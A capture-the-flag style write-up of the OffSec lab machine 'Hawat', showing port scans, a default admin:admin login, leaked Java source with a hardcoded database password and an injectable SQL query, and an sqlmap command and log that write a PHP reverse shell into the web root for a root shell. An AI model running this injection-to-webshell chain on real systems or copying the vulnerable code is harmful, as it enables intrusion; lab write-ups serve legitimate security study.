../

offsec hawat writeup

Machine Info

  • Name: Hawat
  • Description: 1.21 GigHawats
  • Difficulty: Easy

Initial Access

Nmap:

PORT      STATE  SERVICE      VERSION
22/tcp    open   ssh          OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey: 
|   3072 78:2f:ea:84:4c:09:ae:0e:36:bf:b3:01:35:cf:47:22 (RSA)
|   256 d2:7d:eb:2d:a5:9a:2f:9e:93:9a:d5:2e:aa:dc:f4:a6 (ECDSA)
|_  256 b6:d4:96:f0:a4:04:e4:36:78:1e:9d:a5:10:93:d7:99 (ED25519)
17445/tcp open   unknown
| fingerprint-strings: 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Mon, 29 Jan 2024 16:39:57 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
|_    Request</h1></body></html>
30455/tcp open   http         nginx 1.18.0
|_http-title: W3.CSS
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.18.0
50080/tcp open   http         Apache httpd 2.4.46 ((Unix) PHP/7.4.15)
|_http-title: W3.CSS Template
|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.15
| http-methods: 
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|_  Potentially risky methods: TRACE

We have 3 websites, on random ports, let’s dirsearch:

I attempt to login to this cloud instance with creds: admin:admin

It works and I find a zip file for the application on the 17445.

public String checkByPriority(@RequestParam("priority") String priority, Model model) {
                // 
                // Custom code, need to integrate to the JPA
                //
            Properties connectionProps = new Properties();
            connectionProps.put("user", "issue_user");
            connectionProps.put("password", "ManagementInsideOld797");
        try {
                        conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/issue_tracker",connectionProps);
                    String query = "SELECT message FROM issue WHERE priority='"+priority+"'";
            System.out.println(query);
                    Statement stmt = conn.createStatement();
                    stmt.executeQuery(query);

        } catch (SQLException e1) {
                        // TODO Auto-generated catch block
                        e1.printStackTrace();
                }

I see there is a sqlinjection in this function when accessing the /issue/CheckByPriority in the priority field. I will exploit this by using sqlmap:

sqlmap -r sql.req  -p priority --file-write net/rev.php --file-dest /srv/http/rev.php
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.7.9#stable}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:23:02 /2024-01-29/

[14:23:02] [INFO] parsing HTTP request from 'sql.req'
[14:23:02] [INFO] resuming back-end DBMS 'mysql' 
[14:23:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: priority (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: priority=Normal' AND (SELECT 8842 FROM (SELECT(SLEEP(5)))btrU)-- jECY
---
[14:23:02] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[14:23:02] [INFO] fingerprinting the back-end DBMS operating system
[14:23:02] [INFO] the back-end DBMS operating system is Linux
[14:23:03] [WARNING] expect junk characters inside the file as a leftover from original query
do you want confirmation that the local file 'net/rev.php' has been successfully written on the back-end DBMS file system ('/srv/http/rev.php')? [Y/n] Y
[14:23:04] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[14:23:10] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
11
[14:23:29] [INFO] adjusting time delay to 4 seconds due to good response times
7
[14:23:34] [INFO] the remote file '/srv/http/rev.php' is larger (117 B) than the local file 'net/rev.php' (74B)
[14:23:34] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.174.147'

[*] ending @ 14:23:34 /2024-01-29/

I also checked phpinfo on 30455 and saw that the directory it was hosted in is /srv/http so I uploaded the file there and got a shell

[root@hawat http]# id
id
uid=0(root) gid=0(root) groups=0(root)
[root@hawat http]#

Privilege Escalation

No privesc needed, spawned as root!

best, gerbsec